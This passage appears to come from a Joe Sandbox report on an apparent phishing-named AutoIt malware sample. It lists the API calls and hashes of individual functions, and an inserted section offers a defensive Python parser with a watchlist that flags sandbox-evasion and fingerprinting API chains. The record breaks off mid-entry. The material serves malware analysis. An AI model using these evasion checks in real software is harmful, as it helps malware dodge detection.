                                                                                          • Instruction Fuzzy Hash: 98913D75A00208DFDB14DF58C484EA9BBF1FF44318F199099E80A9B362DB75ED85CB91
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 007FE30D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHandling__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 3213639722-2276729525
                                                                                          • Opcode ID: 032876a9a3cb559a398c7a4be763f75e43f772c9c985ea90553b9268447c2bb1
                                                                                          • Instruction ID: 29da0ef3a3e692b644e4a6759cc64473a8216a1ffb0e58372e91397433d54d7e
                                                                                          • Opcode Fuzzy Hash: 032876a9a3cb559a398c7a4be763f75e43f772c9c985ea90553b9268447c2bb1
                                                                                          • Instruction Fuzzy Hash: F5514961E0D20A96DB557B18CD093793BA4FF40B40F3049A8E5D5C23FDEB389CD19A46
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #
                                                                                          • API String ID: 0-1885708031
                                                                                          • Opcode ID: 1a7e104fa02d3af6b537adc74d6fbdbb9025860c16ac6b1da14ec04e93aace27
                                                                                          • Instruction ID: b1760946636691419e19036cf95f9ae0e386e41d6e1eae27f68ade25249e9b6f
                                                                                          • Opcode Fuzzy Hash: 1a7e104fa02d3af6b537adc74d6fbdbb9025860c16ac6b1da14ec04e93aace27
                                                                                          • Instruction Fuzzy Hash: 64513235601296DFDF14DF68D0856BA7BA8FF19310F24845AF991DB2C0DA389D82CBA4
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000), ref: 007EF2A2
                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 007EF2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                          • String ID: @
                                                                                          • API String ID: 2783356886-2766056989
                                                                                          • Opcode ID: a8ff4a13042fd90dd59adf2f4ae3d5ce614d8600904124d4abb2c629ec85b57c
                                                                                          • Instruction ID: 48e577142d7138ae112c511972f2d5473cbcaa7349f45bec718bd9988df9d129
                                                                                          • Opcode Fuzzy Hash: a8ff4a13042fd90dd59adf2f4ae3d5ce614d8600904124d4abb2c629ec85b57c
                                                                                          • Instruction Fuzzy Hash: 87512872418745DBD320AF14DC8ABABBBF8FF84300F81885DF1D981295EB748529CB66
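The per-function records in this section (an APIs list, then the Similarity fields ending in the Instruction Fuzzy Hash) are regular enough to parse, and on a report this long an analyst wants the API chains pulled out and matched against a short watchlist rather than read one record at a time. The Python below is an added example written by the editor; it is not Joe Sandbox code and not part of this report. Its input is constructed from records visible on this page, trimmed to the headers the parser uses, and the WATCHLIST entries are the editor's own generic triage leads, not Joe Sandbox signatures. One caveat that matters for this sample: the report classifies the binary as a likely compiled AutoIt script, so most of these functions are the AutoIt interpreter's runtime (token checks, display queries, drive mapping, memory statistics), and a hit is a lead to confirm against the extracted script, not a verdict about the payload.

```python
"""Parse Joe Sandbox per-function records and flag API chains for triage.
Added example (editor's code, not Joe Sandbox's); the sample text and WATCHLIST are constructed."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: four records copied from this page, trimmed to the headers the parser uses.
SAMPLE_RECORDS = """\
APIs
• GetCurrentThread.KERNEL32 ref: 00831634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008311D9), ref: 00831648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083164F
Similarity
• API ID: CurrentOpenProcessThreadToken
• Instruction Fuzzy Hash: A4E08631601211EBDB201FE19E0DB663B7CFF54B91F154808F685C9080E6B44440C791
APIs
• GetDC.USER32(00000000), ref: 0082D862
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0082D882
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• Instruction Fuzzy Hash: 3CE01AB5800205EFCB419FA0D90C67DBBB1FB18310F15A419E88AE7250CBB85941AF44
APIs
  • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00844ED4
Strings
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• Instruction Fuzzy Hash: 98913D75A00208DFDB14DF58C484EA9BBF1FF44318F199099E80A9B362DB75ED85CB91
APIs
• Sleep.KERNEL32(00000000), ref: 007EF2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 007EF2BB
Similarity
• API ID: GlobalMemorySleepStatus
• Instruction Fuzzy Hash: 87512872418745DBD320AF14DC8ABABBBF8FF84300F81885DF1D981295EB748529CB66
"""

# One API bullet: optional "Part of subcall function ADDR:", Name.MODULE, optional (args), "ref: ADDR".
API_LINE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                      r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")   # "• API ID: value" style fields
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    args: list
    ref: str                    # call-site address from "ref:"
    subcall_of: Optional[str]   # address of the subcall the API sits in, if any

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)   # "API ID", "String ID", hashes
    @property
    def api_names(self):
        return {a.name for a in self.apis}

def parse_records(text):
    """Walk the report text; a record ends at its Instruction Fuzzy Hash line."""
    records, cur, mode = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            if line in ("APIs", "Strings") and cur is None:
                cur = FuncRecord()        # first header of a new record
            mode = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        if mode == "APIs" and (m := API_LINE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], args, m["ref"], m["sub"]))
        elif mode == "Similarity" and (m := FIELD_LINE.match(line)):
            key = m["key"].strip()
            cur.similarity[key] = m["val"].strip()
            if key == "Instruction Fuzzy Hash":   # last field of every record
                records.append(cur)
                cur = None
    return records

# Editor's triage heuristics (assumption: generic analyst leads, not sandbox signatures).
WATCHLIST = [
    ("sleep + RAM size query (sandbox/VM sizing check)",
     lambda r: {"Sleep", "GlobalMemoryStatusEx"} <= r.api_names),
    ("opens own process token (privilege/elevation check)",
     lambda r: "OpenProcessToken" in r.api_names),
    ("maps a network resource (share or LPT printer)",
     lambda r: "WNetUseConnectionW" in r.api_names),
    ("screen colour depth via GetDeviceCaps(BITSPIXEL = 0xC)",
     lambda r: any(a.name == "GetDeviceCaps" and a.args[-1:] == ["0000000C"] for a in r.apis)),
]

def triage(text):
    """One dict per record that matches at least one watchlist entry, in report order."""
    hits = []
    for rec in parse_records(text):
        reasons = [label for label, pred in WATCHLIST if pred(rec)]
        if reasons:
            hits.append({"api_id": rec.similarity.get("API ID", ""),
                         "apis": sorted(rec.api_names), "reasons": reasons})
    return hits
```

Running `triage(SAMPLE_RECORDS)` returns four hits, one per constructed record, each keyed by the report's own API ID so it can be cross-referenced back to the page. The BITSPIXEL entry shows why argument values are kept: GetDeviceCaps on its own is noise, but index 0xC (BITSPIXEL) is the colour-depth query that fingerprinting code tends to make. To apply this to the full report, feed it the text of this section; the parser ignores the Memory Dump Source and IDA Plugin blocks and tolerates records that have a Strings header but no APIs.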
                                                                                          APIs
                                                                                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008557E0
                                                                                          • _wcslen.LIBCMT ref: 008557EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                          • String ID: CALLARGARRAY
                                                                                          • API String ID: 157775604-1150593374
                                                                                          • Opcode ID: 03e57c53c6e34ac489f1681f3ad7ded4a39ba1e3a8eecd4cceb23d883b415a0e
                                                                                          • Instruction ID: 9bcb83f7c7a2b0ad09edbaee49b8e3a1545a1611f7f83d0225defa4ed57b3ed2
                                                                                          • Opcode Fuzzy Hash: 03e57c53c6e34ac489f1681f3ad7ded4a39ba1e3a8eecd4cceb23d883b415a0e
                                                                                          • Instruction Fuzzy Hash: 5D41DC31E00209DFCB04DFA9C8958BEBBB5FF59725F10402AE905E7291E7749D89CBA0
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0084D130
                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0084D13A
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CrackInternet_wcslen
                                                                                          • String ID: |
                                                                                          • API String ID: 596671847-2343686810
                                                                                          • Opcode ID: d59b7a3b8137568c42b23f54ef4f5df7d678187c15d4435cd3abc70919694837
                                                                                          • Instruction ID: abdff34fc8a1ab5e24c5977306b283e09f1f4863fd60204355ff8ce69dfab956
                                                                                          • Opcode Fuzzy Hash: d59b7a3b8137568c42b23f54ef4f5df7d678187c15d4435cd3abc70919694837
                                                                                          • Instruction Fuzzy Hash: 2B311D75D00219EBCF15EFA4CC89AEEBFB9FF04304F10001AF915A6266E735AA56DB50
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00863621
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0086365C
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$DestroyMove
                                                                                          • String ID: static
                                                                                          • API String ID: 2139405536-2160076837
                                                                                          • Opcode ID: eea09e5898e2d90dd5306a056c4b0a15dafef9649528446475c9fd35e65612f2
                                                                                          • Instruction ID: 2e86bddc8066647d38be04947cd5ffe61f1a2ea793ac07481d915124e4cbabe4
                                                                                          • Opcode Fuzzy Hash: eea09e5898e2d90dd5306a056c4b0a15dafef9649528446475c9fd35e65612f2
                                                                                          • Instruction Fuzzy Hash: 9F319E71100204AEDB109F68DC85EFB73A9FF98724F01961AF9A5D7290DA74AD81D760
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0086461F
                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00864634
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: '
                                                                                          • API String ID: 3850602802-1997036262
                                                                                          • Opcode ID: 015681ca7bc3d15d6af35395adc1de5368d40f0c1981409a0dd14b6fc777e62f
                                                                                          • Instruction ID: e527fa9493f2ff681325843f4d67bd2bc026d088611f9c88c3f559614fe60df5
                                                                                          • Opcode Fuzzy Hash: 015681ca7bc3d15d6af35395adc1de5368d40f0c1981409a0dd14b6fc777e62f
                                                                                          • Instruction Fuzzy Hash: 76311674A0120A9FEF14CFA9C984ADEBBB5FB19300F15506AE905EB341D770A941CF90
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008133A2
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D3A04
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                          • String ID: Line:
                                                                                          • API String ID: 2289894680-1585850449
                                                                                          • Opcode ID: aa9945f35a8d04042e3f600dd6199a49743e4c5a18814b5f3cf64d11174cfd18
                                                                                          • Instruction ID: 7c9eb3bbe55b869a88ba4c6d1959298e26be33727c81a3ed7222cc6d1848cc75
                                                                                          • Opcode Fuzzy Hash: aa9945f35a8d04042e3f600dd6199a49743e4c5a18814b5f3cf64d11174cfd18
                                                                                          • Instruction Fuzzy Hash: D131C471508304AADB21EB10DC49BEBB7ECBF41714F00452BF59982791DB78AA48C7D3
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0086327C
                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00863287
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: Combobox
                                                                                          • API String ID: 3850602802-2096851135
                                                                                          • Opcode ID: 59d972e87ac77e1fb93eaef1f4da3d3d6e25d148fcb352c6304b98e88d408a6e
                                                                                          • Instruction ID: 38c5fa6538f510044eb43250ddd4ae03fb4b3fb8d533e955d66296f3e1c803fa
                                                                                          • Opcode Fuzzy Hash: 59d972e87ac77e1fb93eaef1f4da3d3d6e25d148fcb352c6304b98e88d408a6e
                                                                                          • Instruction Fuzzy Hash: C311E271300208BFFF219E54DC95EBB37AAFB943A5F120128F928E7390D6719D518760
                                                                                          APIs
                                                                                            • Part of subcall function 007D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
                                                                                            • Part of subcall function 007D600E: GetStockObject.GDI32(00000011), ref: 007D6060
                                                                                            • Part of subcall function 007D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0086377A
                                                                                          • GetSysColor.USER32(00000012), ref: 00863794
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                          • String ID: static
                                                                                          • API String ID: 1983116058-2160076837
                                                                                          • Opcode ID: 1d16c1fb0a30e1b288b8f206bfb8813a40b7c6b91b6e8ba83e17aec25f8d4794
                                                                                          • Instruction ID: 65589b951ec83d629b1ea7e4c64f1b39f103202e7add1ea0b7f54a0884232698
                                                                                          • Opcode Fuzzy Hash: 1d16c1fb0a30e1b288b8f206bfb8813a40b7c6b91b6e8ba83e17aec25f8d4794
                                                                                          • Instruction Fuzzy Hash: FB113AB2610209AFDF00DFA8CC46EFA7BB8FB09354F014525F9A6E2250E775E8519B50
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0084CD7D
                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0084CDA6
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Internet$OpenOption
                                                                                          • String ID: <local>
                                                                                          • API String ID: 942729171-4266983199
                                                                                          • Opcode ID: 77a7dea11a3774b9d34040bc379d33d3a6661f8559d76017082c8dbea1f74959
                                                                                          • Instruction ID: d4328d8dfe1bb9982fdb29aeab7a9632c7c1fa46116c08201cffd82637a1ad90
                                                                                          • Opcode Fuzzy Hash: 77a7dea11a3774b9d34040bc379d33d3a6661f8559d76017082c8dbea1f74959
                                                                                          • Instruction Fuzzy Hash: 6811C671A06639BAD7B84B668C45FF7BE6CFF127A4F004226B159C3190D7749840D6F0
                                                                                          APIs
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 008634AB
                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008634BA
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                          • String ID: edit
                                                                                          • API String ID: 2978978980-2167791130
                                                                                          • Opcode ID: 32cb5fab25de1a871df1739e9fff7888b8e0ba30927f8f9ef277ccc70dc01c7f
                                                                                          • Instruction ID: 3cb7af01e1cef085d26b67994ed9f27612b354415e5a05b1a09b679a04b890af
                                                                                          • Opcode Fuzzy Hash: 32cb5fab25de1a871df1739e9fff7888b8e0ba30927f8f9ef277ccc70dc01c7f
                                                                                          • Instruction Fuzzy Hash: C5119D71100108AAEB114E64DC44EBA776AFB25378F524324FA61D31E0CB75DD519758
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00836CB6
                                                                                          • _wcslen.LIBCMT ref: 00836CC2
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                          • String ID: STOP
                                                                                          • API String ID: 1256254125-2411985666
                                                                                          • Opcode ID: 6eb9855d6e3059886d58f7f529591f1a777aa94664a62991fe63ce63613586e1
                                                                                          • Instruction ID: d188a6f79b03e0234fbad60d711ff2ec1d6c0c9af5680c7fb83a4d551a891295
                                                                                          • Opcode Fuzzy Hash: 6eb9855d6e3059886d58f7f529591f1a777aa94664a62991fe63ce63613586e1
                                                                                          • Instruction Fuzzy Hash: E6010832A00526ABCB209FBDDC448BF77B4FBA0714B004529E452D6291FA35D811C790
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00831D4C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: f938adafd8778e7a84b16e949247f387ba3a40ac0d5d8a738eea4bde707e1e04
                                                                                          • Instruction ID: 0f62113e80fa93124d3b70254da6ac104f5afa58c13cf3291d3f80e17001fbc7
                                                                                          • Opcode Fuzzy Hash: f938adafd8778e7a84b16e949247f387ba3a40ac0d5d8a738eea4bde707e1e04
                                                                                          • Instruction Fuzzy Hash: 6A01D871601218AB8F04EBA4DC59CFE7778FB97750F44051AF872A73C1EB38590887A0
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00831C46
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: 5e3abd76c7425643c2f9f518b3ff399ebd43e496205646cc4a537a5e29824c0f
                                                                                          • Instruction ID: 040fd97d71997e536b64fb58f0c189ec86be6f6a7286e07bde82f5535aac9e74
                                                                                          • Opcode Fuzzy Hash: 5e3abd76c7425643c2f9f518b3ff399ebd43e496205646cc4a537a5e29824c0f
                                                                                          • Instruction Fuzzy Hash: C301F771780108A6CF04EBA0C9599FF77A8FB61740F14101AB516B3381EA249E0997F1
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00831CC8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: dbd95cad79052b190883512b91f15cdd19a812dd657dc745a7adae87d007b2ab
                                                                                          • Instruction ID: 9f002af6d48010537b3d4df552b6558c16b190cea24d044658933a8e40177856
                                                                                          • Opcode Fuzzy Hash: dbd95cad79052b190883512b91f15cdd19a812dd657dc745a7adae87d007b2ab
                                                                                          • Instruction Fuzzy Hash: 5901D671780118A7CF14FBA4CA09AFE77A8FB51740F141016B906F3381EA649F0AD6B2
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00831DD3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: 43b9fb652caef7e900efffc916ce0c5ee5d34d61f74e9c150c56b7f3f9682447
                                                                                          • Instruction ID: 3d1de77786040b96112917e58997ee791ef62edad412f50d8fd4b296b16fb496
                                                                                          • Opcode Fuzzy Hash: 43b9fb652caef7e900efffc916ce0c5ee5d34d61f74e9c150c56b7f3f9682447
                                                                                          • Instruction Fuzzy Hash: AFF0A471B51218A6DF04F7A4DC5AAFE7778FF52B54F04091AB922E33C1DAA4590882A1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: 3, 3, 16, 1
                                                                                          • API String ID: 176396367-3042988571
                                                                                          • Opcode ID: 205218e6966442fd9e6a950f14e114d850bd197d821ab6f2d4cbc4b1d4599475
                                                                                          • Instruction ID: 9675db6a4dd30b16ad6064c79db4dee670c2d173874c4787de4abcbe1384f9cb
                                                                                          • Opcode Fuzzy Hash: 205218e6966442fd9e6a950f14e114d850bd197d821ab6f2d4cbc4b1d4599475
                                                                                          • Instruction Fuzzy Hash: 9DE02B42314220A192312279BCC597F5689EFC5751714182FFE85C2366EAD89D9193A5
                                                                                          APIs
                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00830B23
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                          • API String ID: 2030045667-4017498283
                                                                                          • Opcode ID: eb38b154e1662264dc5dfc05fc563f95009c33e85855c46c3dc30ed8e5d431d3
